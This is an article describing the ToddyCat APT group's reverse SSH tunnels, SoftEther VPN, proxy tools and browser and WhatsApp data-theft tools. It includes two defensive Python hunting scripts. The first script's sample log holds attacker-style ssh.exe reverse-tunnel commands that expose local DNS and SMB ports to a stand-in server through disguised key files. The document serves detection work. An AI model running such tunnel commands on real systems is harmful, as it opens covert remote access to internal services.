How the ToddyCat threat group sets up backup traffic tunnels into victim networks

ToddyCat, a Chinese advanced persistent threat (APT) group that has been targeting Asian and European government and military organizations over the past four years, is using several different traffic tunneling tools to ensure persistent access to compromised networks, according to researchers at Kaspersky Lab.

The group’s primary goal is the exfiltration of large volumes of sensitive information, which can take a long time and is prone to detection, researchers from the security firm said in a new report.

“Having several tunnels to the infected infrastructure implemented with different tools allows attackers to maintain access to systems even if one of the tunnels is discovered and eliminated,” the researchers said. “By securing constant access to the infrastructure, attackers are able to perform reconnaissance and connect to remote hosts.”

ToddyCat is known to use DLL hijacking techniques to deploy its malware. This involves delivering the payload with a specific DLL name together with a legitimate executable that looks for that specific DLL in its working directory when executed. Having malicious code indirectly loaded into memory by a legitimate application is much stealthier than executing malware binaries directly.

The group is also known to use custom malware loaders that are tailored for every victim. However, when it comes to tunneling, the group seems to rely on many third-party tools.

ToddyCat uses reverse SSH tunnels

The ToddyCat attackers will often set up a reverse SSH tunnel, meaning an SSH connection from the compromised system back to their command-and-control server, instead of setting up an SSH server on the system and then remotely connecting to it. The benefit of a reverse tunnel is that most firewalls and network monitoring tools will not find an outgoing SSH connection suspicious, but an incoming one might be blocked or filtered.

To set up these tunnels, the attackers simply use the SSH client from the OpenSSH toolkit for Windows together with the openssh library required to run it and a private key file that allows the endpoint to authenticate to the server.

The OpenSSH client is dropped in the regular `C:\Program Files\OpenSSH` location, since its presence there would not necessarily be suspicious. The private key file, however, is given an .ini or .dat extension to hide its true purpose and is placed in the `C:\Windows\AppReadiness` folder. This folder is used by the Windows AppReadiness service to store application files for initial Windows or user configuration.

Furthermore, the attackers execute a script called a.bat which changes the directory ownership of this folder to make it only accessible to the SYSTEM user and inaccessible to regular users and Administrators.

The SSH tunnel will be started by a scheduled task and will be used to tunnel traffic from the attackers’ server to a local service. For example, a connection from user systemtest01 will tunnel traffic from port 31481 on the server to local port 53 (DNS) while a connection from user systemtest05 will redirect traffic from the malicious server to port 445, normally used by the SMB service. This will allow the attackers to interact with those local services remotely over the SSH tunnel.

For example, if the local system is a domain controller, it will likely run a DNS server on port 53 which can be queried to discover internal network hostnames. On the other hand, SMB is used for file sharing and could give access to local file shares on the server.
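The indicators above (ssh.exe run with a reverse forward to a local DNS or SMB port, a key file with a disguised extension, the key stored under AppReadiness) can be checked mechanically in process-creation telemetry. The following script is an added example written for this article, not code from the Kaspersky report or from ToddyCat; the log format, the account names, the IP address and the extra sensitive ports beyond 53 and 445 are constructed assumptions for illustration.

```python
"""Flag ssh.exe invocations that look like the reverse tunnels described above.

Input is a constructed, simplified process-creation log with one record per
line: <timestamp> <account> <command line>. Real telemetry (Sysmon event 1,
Windows 4688) carries the same fields under different names.
"""
import re
from dataclasses import dataclass, field
from pathlib import PureWindowsPath

# Local ports named in the article (53 DNS, 445 SMB) plus two more that an
# analyst would normally treat the same way (assumption, not from the report).
SENSITIVE_LOCAL_PORTS = {53: "DNS", 445: "SMB", 3389: "RDP", 5985: "WinRM"}
# Extensions the article reports being used to disguise the private key.
DISGUISE_EXTENSIONS = {".ini", ".dat"}
# Folder the article names as the drop location for the key file.
SUSPICIOUS_KEY_DIRS = {r"c:\windows\appreadiness"}

# Constructed sample records; not real telemetry.
SAMPLE_LOG = """\
2024-04-22T10:01:02Z SYSTEM "C:\\Program Files\\OpenSSH\\ssh.exe" -N -R 31481:127.0.0.1:53 -i C:\\Windows\\AppReadiness\\settings.ini systemtest01@198.51.100.7
2024-04-22T10:01:05Z SYSTEM "C:\\Program Files\\OpenSSH\\ssh.exe" -N -R 0.0.0.0:31445:127.0.0.1:445 -i C:\\Windows\\AppReadiness\\cache.dat systemtest05@198.51.100.7
2024-04-22T11:30:00Z CORP\\bob "C:\\Program Files\\OpenSSH\\ssh.exe" -i C:\\Users\\bob\\.ssh\\id_ed25519 bob@build.corp.example
2024-04-22T11:45:10Z CORP\\alice "C:\\Program Files\\OpenSSH\\ssh.exe" -R 8080:localhost:8080 alice@dev.corp.example
"""


@dataclass
class Finding:
    line_no: int
    account: str
    forwards: list = field(default_factory=list)   # (remote_port, local_port)
    reasons: list = field(default_factory=list)


def parse_reverse_forward(spec):
    """Parse an ssh -R spec: [bind:]remote_port:host:local_port."""
    parts = spec.split(":")
    if len(parts) == 3:
        return int(parts[0]), int(parts[2])
    if len(parts) == 4:
        return int(parts[1]), int(parts[3])
    return None


def analyze_command_line(cmdline):
    """Return (forwards, reasons) for an ssh.exe command line, else None."""
    # Tokenize on whitespace while keeping quoted paths (with spaces) intact.
    argv = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]
    if not argv or PureWindowsPath(argv[0]).name.lower() not in {"ssh.exe", "ssh"}:
        return None
    specs, identity, i = [], None, 1
    while i < len(argv):
        arg = argv[i]
        if arg == "-R" and i + 1 < len(argv):
            specs.append(argv[i + 1]); i += 2; continue
        if arg.startswith("-R") and len(arg) > 2:
            specs.append(arg[2:]); i += 1; continue
        if arg == "-i" and i + 1 < len(argv):
            identity = argv[i + 1]; i += 2; continue
        i += 1
    forwards, reasons = [], []
    for spec in specs:
        parsed = parse_reverse_forward(spec)
        if parsed is None:
            continue
        forwards.append(parsed)
        remote_port, local_port = parsed
        if local_port in SENSITIVE_LOCAL_PORTS:
            reasons.append(f"-R exposes local port {local_port} "
                           f"({SENSITIVE_LOCAL_PORTS[local_port]}) on server port {remote_port}")
    if identity:
        key = PureWindowsPath(identity)
        if key.suffix.lower() in DISGUISE_EXTENSIONS:
            reasons.append(f"identity file with disguised extension {key.suffix}")
        if str(key.parent).lower() in SUSPICIOUS_KEY_DIRS:
            reasons.append(f"identity file stored in {key.parent}")
    return forwards, reasons


def scan_log(text):
    """Return a Finding for each record with a reverse forward plus another indicator."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = re.match(r"^(\S+) (\S+) (.*)$", line)
        if not m:
            continue
        result = analyze_command_line(m.group(3))
        if result is None:
            continue
        forwards, reasons = result
        # A bare -R (alice's case) is common enough in developer use that it is
        # only reported when a second indicator is present.
        if forwards and reasons:
            findings.append(Finding(line_no, m.group(2), forwards, reasons))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no} ({f.account}): " + "; ".join(f.reasons))
```

On the sample log the two SYSTEM records are reported (DNS and SMB exposed through disguised keys under AppReadiness) while bob's ordinary login and alice's plain port forward are not; in production the same logic would run over exported Sysmon or 4688 events rather than the embedded sample.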

VPN connections have been set up on compromised servers

The ToddyCat attackers were also observed setting up virtual private network (VPN) servers on compromised systems by using the open-source SoftEther VPN software in order to be able to remotely connect to those systems. SoftEther supports multiple VPN protocols including L2TP/IPsec, OpenVPN, MS-SSTP, L2TPv3, EtherIP and others.

The attackers will use a remote SMB share to deploy a copy of the SoftEther vpnserver_x64.exe executable on compromised systems but rename it to other common applications, including security programs. They will also deploy a file called hamcore.se2 that is required by SoftEther to run in the same folder, as well as the vpn_server.config configuration file.
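Because the executable is renamed but hamcore.se2 and vpn_server.config must still sit next to it, the support files are a better hunting key than the binary name. The following script is an added example for this article, not code from the report or from SoftEther; it builds a throwaway directory tree with constructed file names (the renamed binary `secsvc.exe` is an invented placeholder) and then walks it looking for SoftEther deployments whose executable is not the stock `vpnserver_x64.exe`.

```python
"""Hunt for SoftEther VPN server deployments by their mandatory support files.

SoftEther needs hamcore.se2 (and normally vpn_server.config) in the same folder
as its executable, so a folder holding those files plus an .exe with an
unexpected name is the pattern described above.
"""
import os
import tempfile
from pathlib import Path

SUPPORT_FILES = {"hamcore.se2", "vpn_server.config"}
STOCK_EXE_NAMES = {"vpnserver_x64.exe", "vpnserver.exe"}


def find_softether_deployments(root):
    """Return a list of dicts for each folder that holds hamcore.se2."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        names = {n.lower() for n in filenames}
        if "hamcore.se2" not in names:
            continue
        exes = sorted(n for n in names if n.endswith(".exe"))
        hits.append({
            "dir": dirpath,
            "exes": exes,
            "has_config": "vpn_server.config" in names,
            # Renamed if no executable in the folder carries the stock name.
            "renamed": not any(n in STOCK_EXE_NAMES for n in exes),
        })
    return hits


def build_sample_tree(root):
    """Create a constructed tree: one renamed deployment, one stock install, one noise folder."""
    root = Path(root)
    renamed = root / "ProgramData" / "SecurityUpdates"
    stock = root / "Program Files" / "SoftEther VPN Server"
    noise = root / "Users" / "Public" / "Documents"
    for d in (renamed, stock, noise):
        d.mkdir(parents=True, exist_ok=True)
    for name in ("secsvc.exe", "hamcore.se2", "vpn_server.config"):   # placeholder exe name
        (renamed / name).write_bytes(b"constructed sample")
    for name in ("vpnserver_x64.exe", "hamcore.se2", "vpn_server.config"):
        (stock / name).write_bytes(b"constructed sample")
    (noise / "notes.txt").write_text("nothing to see here")
    return str(root)


def renamed_deployments(root):
    """Convenience wrapper: only the folders where the executable was renamed."""
    return [h for h in find_softether_deployments(root) if h["renamed"]]


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for hit in find_softether_deployments(tmp):
            flag = "RENAMED" if hit["renamed"] else "stock name"
            print(f"{flag:10} {hit['dir']}  exes={hit['exes']}")
```

Against a real host the root would be each fixed drive rather than a temporary directory, and a stock-named install under Program Files still deserves a look if nobody in the organisation deployed SoftEther deliberately.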

Reverse proxy tools deployed to encrypt data

The attackers were also seen deploying a proxy tool called Krong through DLL hijacking via the legitimate AVG TuneUp software. Krong encrypts the data transmitted through it using the XOR function and the attackers use it in combination with another open-source reverse proxy for HTTP, TLS or TCP-based applications called Ngrok.

The attackers used Ngrok to pass traffic from their remote command-and-control server to the endpoint systems and Ngrok then passed that traffic to Krong for further encryption.

In addition to these tools, the researchers also saw the ToddyCat attackers deploy a reverse proxy written in Go and called FRP (fast reverse proxy). This tool is designed to enable access to a local server behind a NAT or firewall and is suited for accessing resources on private networks without the need for things like port forwarding in the router.

Multiple data collection tools used by ToddyCat

To automate data collection from compromised systems and networks the group uses a combination of programs, according to Kaspersky’s analysis. One is a custom tool written in .NET that can search for certain words inside file names or for files with certain extensions or last-modified dates and then add the found files to a ZIP archive. The researchers have dubbed this tool “cuthead”.

Another tool also written in .NET and dubbed WAExp is designed to steal the chat history and other user data from the web app version of the popular WhatsApp messaging platform.

“For users of the WhatsApp web app, their browser local storage contains their profile details, chat data, the phone numbers of users they chat with and current session data,” the researchers said. “Attackers can gain access to this data by copying the browser’s local storage files.”

A third custom tool dubbed TomBerBil is used to decrypt the local browser storage from Chrome and Microsoft Edge and steal all authentication cookies and stored passwords which would potentially enable them to gain access to the online accounts of the targeted users.

“In several cases, besides using TomBerBil, the adversary created a shadow copy of the disk and archived the User Data file with 7zip for further exfiltration,” the researchers said. The Kaspersky report contains a list of indicators of compromise such as file hashes, IP addresses used by ToddyCat’s command-and-control servers and URLs used to host the various tools that are deployed on compromised systems.
